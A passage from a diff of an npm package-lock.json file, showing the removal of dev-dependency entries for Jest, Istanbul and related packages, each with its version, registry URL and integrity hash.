"sha512-tUkiguQGW7S3IhB7N+c2MV/HZPSCPAAiYBZXLsBhFB/PCy6ZKKsZrmBayHV9fdGV/ARIfJ14NkxKzRDjvp7L6w==", - "dev": true, - "requires": { - "caniuse-lite": "^1.0.30001449", - "electron-to-chromium": "^1.4.284", - "node-releases": "^2.0.8", - "update-browserslist-db": "^1.0.10" - } - }, - "bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "requires": { - "node-int64": "^0.4.0" - } - }, - "buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true - }, - "camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true - }, - "caniuse-lite": { - "version": "1.0.30001450", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001450.tgz", - "integrity": "sha512-qMBmvmQmFXaSxexkjjfMvD5rnDL0+m+dUMZKoDYsGG8iZN29RuYh9eRoMvKsT6uMAWlyUUGDEQGJJYjzCIO9ew==", - "dev": true - }, - "chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "requires": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - } - }, - "char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true - }, - "ci-info": { - "version": "3.7.1", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.7.1.tgz", - "integrity": "sha512-4jYS4MOAaCIStSRwiuxc4B8MYhIe676yO1sYGzARnjXkWpmzZMMYxY6zu8WYWDhSuth5zhrQ1rhNSibyyvv4/w==", - "dev": true - }, - "cjs-module-lexer": { - "version": "1.2.2", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.2.tgz", - "integrity": "sha512-cOU9usZw8/dXIXKtwa8pM0OTJQuJkxMN6w30csNRUerHfeQ5R6U3kkU/FtJeIf3M202OHfY2U8ccInBG7/xogA==", - "dev": true - }, - "cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "requires": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - } - }, - "co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true - }, - "collect-v8-coverage": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.1.tgz", - "integrity": "sha512-iBPtljfCNcTKNAto0KEtDfZ3qzjJvqE3aTGZsbhjSBlorqpXJlaWWtPO35D+ZImoC3KWejX64o+yPGxhWSTzfg==", - "dev": true - }, - "color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dev": true, - "requires": { - "color-name": "~1.1.4" - } - }, - "color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, - "concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", - "dev": true, - "requires": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - } - }, - "debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "requires": { - "ms": "2.1.2" - } - }, - "dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true - }, - "deepmerge": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.0.tgz", - "integrity": "sha512-z2wJZXrmeHdvYJp/Ux55wIjqo81G5Bp4c+oELTW+7ar6SogWHajt5a9gO3s3IDaGSAXjDk0vlQKN3rms8ab3og==", - "dev": true - }, - "detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true - }, - "diff-sequences": { - "version": "29.3.1", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.3.1.tgz", - "integrity": "sha512-hlM3QR272NXCi4pq+N4Kok4kOp6EsgOM3ZSpJI7Da3UAs+Ttsi8MRmB6trM/lhyzUxGfOgnpkHtgqm5Q/CTcfQ==", - "dev": true - }, - "electron-to-chromium": { - "version": "1.4.284", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.284.tgz", - "integrity": "sha512-M8WEXFuKXMYMVr45fo8mq0wUrrJHheiKZf6BArTKk9ZBYCKJEOU5H8cdWgDT+qCVZf7Na4lVUaZsA+h6uA9+PA==", - "dev": true - }, - "emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "requires": { - "is-arrayish": "^0.2.1" - } - }, - "escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", - "dev": true - }, - "escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true - }, - "esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true - }, - "execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "requires": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - } - }, - "exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true - }, - "expect": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.4.1.tgz", - "integrity": "sha512-OKrGESHOaMxK3b6zxIq9SOW8kEXztKff/Dvg88j4xIJxur1hspEbedVkR3GpHe5LO+WB2Qw7OWN0RMTdp6as5A==", - "dev": true, - "requires": { - "@jest/expect-utils": "^29.4.1", - "jest-get-type": "^29.2.0", - "jest-matcher-utils": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1" - } - }, - "fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", - "dev": true - }, - "fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "requires": { - "bser": "2.1.1" - } - }, - "fill-range": { - "version": "7.0.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.0.1.tgz", - "integrity": "sha512-qOo9F+dMUmC2Lcb4BbVvnKJxTPjCm+RRpe4gDuGrzkL7mEVl/djYSu2OdQ2Pa302N4oqkSg9ir6jaLWJ2USVpQ==", - "dev": true, - "requires": { - "to-regex-range": "^5.0.1" - } - }, - "find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "requires": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - } - }, - "fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "fsevents": { - "version": "2.3.2", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", - "dev": true, - "optional": true - }, - "function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true - }, - "gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true - }, - "get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true - }, - "get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true - }, - "get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true - }, - "glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "requires": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - } - }, - "globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true - }, - "graceful-fs": { - "version": "4.2.10", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.10.tgz", - "integrity": "sha512-9ByhssR2fPVsNZj478qUUbKfmL0+t5BDVyjShtyZZLiK7ZDAArFFfopyOTj0M05wE2tJPisA4iTnnXl2YoPvOA==", - "dev": true - }, - "has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", - "dev": true, - "requires": { - "function-bind": "^1.1.1" - } - }, - "has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true - }, - "html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true - }, - "import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "requires": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - } - }, - "imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true - }, - "inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "requires": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "is-core-module": { - "version": "2.11.0", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.11.0.tgz", - "integrity": "sha512-RRjxlvLDkD1YJwDbroBHMb+cukurkDWNyHx7D3oNB5x9rb5ogcksMC5wHCadcXoo67gVr/+3GFySh3134zi6rw==", - "dev": true, - "requires": { - "has": "^1.0.3" - } - }, - "is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true - }, - "is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true - }, - "is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true - }, - "is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true - }, - "isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true - }, - "istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "requires": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - } - }, - "istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", - "dev": true, - "requires": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" - } - }, - "istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "requires": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - } - }, - "istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", - "dev": true, - "requires": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - } - }, - "jest": { - "version": "29.3.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.3.1.tgz", - "integrity": "sha512-6iWfL5DTT0Np6UYs/y5Niu7WIfNv/wRTtN5RSXt2DIEft3dx3zPuw/3WJQBCJfmEzvDiEKwoqMbGD9n49+qLSA==", - "dev": true, - "requires": { - "@jest/core": "^29.3.1", - "@jest/types": "^29.3.1", - "import-local": "^3.0.2", - "jest-cli": "^29.3.1" - } - }, - "jest-changed-files": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.4.0.tgz", - "integrity": "sha512-rnI1oPxgFghoz32Y8eZsGJMjW54UlqT17ycQeCEktcxxwqqKdlj9afl8LNeO0Pbu+h2JQHThQP0BzS67eTRx4w==", - "dev": true, - "requires": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - } - }, - "jest-circus": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.4.1.tgz", - "integrity": "sha512-v02NuL5crMNY4CGPHBEflLzl4v91NFb85a+dH9a1pUNx6Xjggrd8l9pPy4LZ1VYNRXlb+f65+7O/MSIbLir6pA==", - "dev": true, - "requires": { - "@jest/environment": "^29.4.1", - "@jest/expect": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.4.1", - "jest-matcher-utils": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-runtime": "^29.4.1", - "jest-snapshot": "^29.4.1", - "jest-util": "^29.4.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-cli": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.4.1.tgz", - "integrity": "sha512-jz7GDIhtxQ37M+9dlbv5K+/FVcIo1O/b1sX3cJgzlQUf/3VG25nvuWzlDC4F1FLLzUThJeWLu8I7JF9eWpuURQ==", - "dev": true, - "requires": { - "@jest/core": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/types": "^29.4.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.4.1", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - } - }, - "jest-config": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.4.1.tgz", - "integrity": "sha512-g7p3q4NuXiM4hrS4XFATTkd+2z0Ml2RhFmFPM8c3WyKwVDNszbl4E7cV7WIx1YZeqqCtqbtTtZhGZWJlJqngzg==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.4.1", - "@jest/types": "^29.4.1", - "babel-jest": "^29.4.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.4.1", - "jest-environment-node": "^29.4.1", - "jest-get-type": "^29.2.0", - "jest-regex-util": "^29.2.0", - "jest-resolve": "^29.4.1", - "jest-runner": "^29.4.1", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - } - }, - "jest-diff": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.4.1.tgz", - "integrity": "sha512-uazdl2g331iY56CEyfbNA0Ut7Mn2ulAG5vUaEHXycf1L6IPyuImIxSz4F0VYBKi7LYIuxOwTZzK3wh5jHzASMw==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^29.3.1", - "jest-get-type": "^29.2.0", - "pretty-format": "^29.4.1" - } - }, - "jest-docblock": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.2.0.tgz", - "integrity": "sha512-bkxUsxTgWQGbXV5IENmfiIuqZhJcyvF7tU4zJ/7ioTutdz4ToB5Yx6JOFBpgI+TphRY4lhOyCWGNH/QFQh5T6A==", - "dev": true, - "requires": { - "detect-newline": "^3.0.0" - } - }, - "jest-each": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.4.1.tgz", - "integrity": "sha512-QlYFiX3llJMWUV0BtWht/esGEz9w+0i7BHwODKCze7YzZzizgExB9MOfiivF/vVT0GSQ8wXLhvHXh3x2fVD4QQ==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.2.0", - "jest-util": "^29.4.1", - "pretty-format": "^29.4.1" - } - }, - "jest-environment-node": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.4.1.tgz", - "integrity": "sha512-x/H2kdVgxSkxWAIlIh9MfMuBa0hZySmfsC5lCsWmWr6tZySP44ediRKDUiNggX/eHLH7Cd5ZN10Rw+XF5tXsqg==", - "dev": true, - "requires": { - "@jest/environment": "^29.4.1", - "@jest/fake-timers": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "jest-mock": 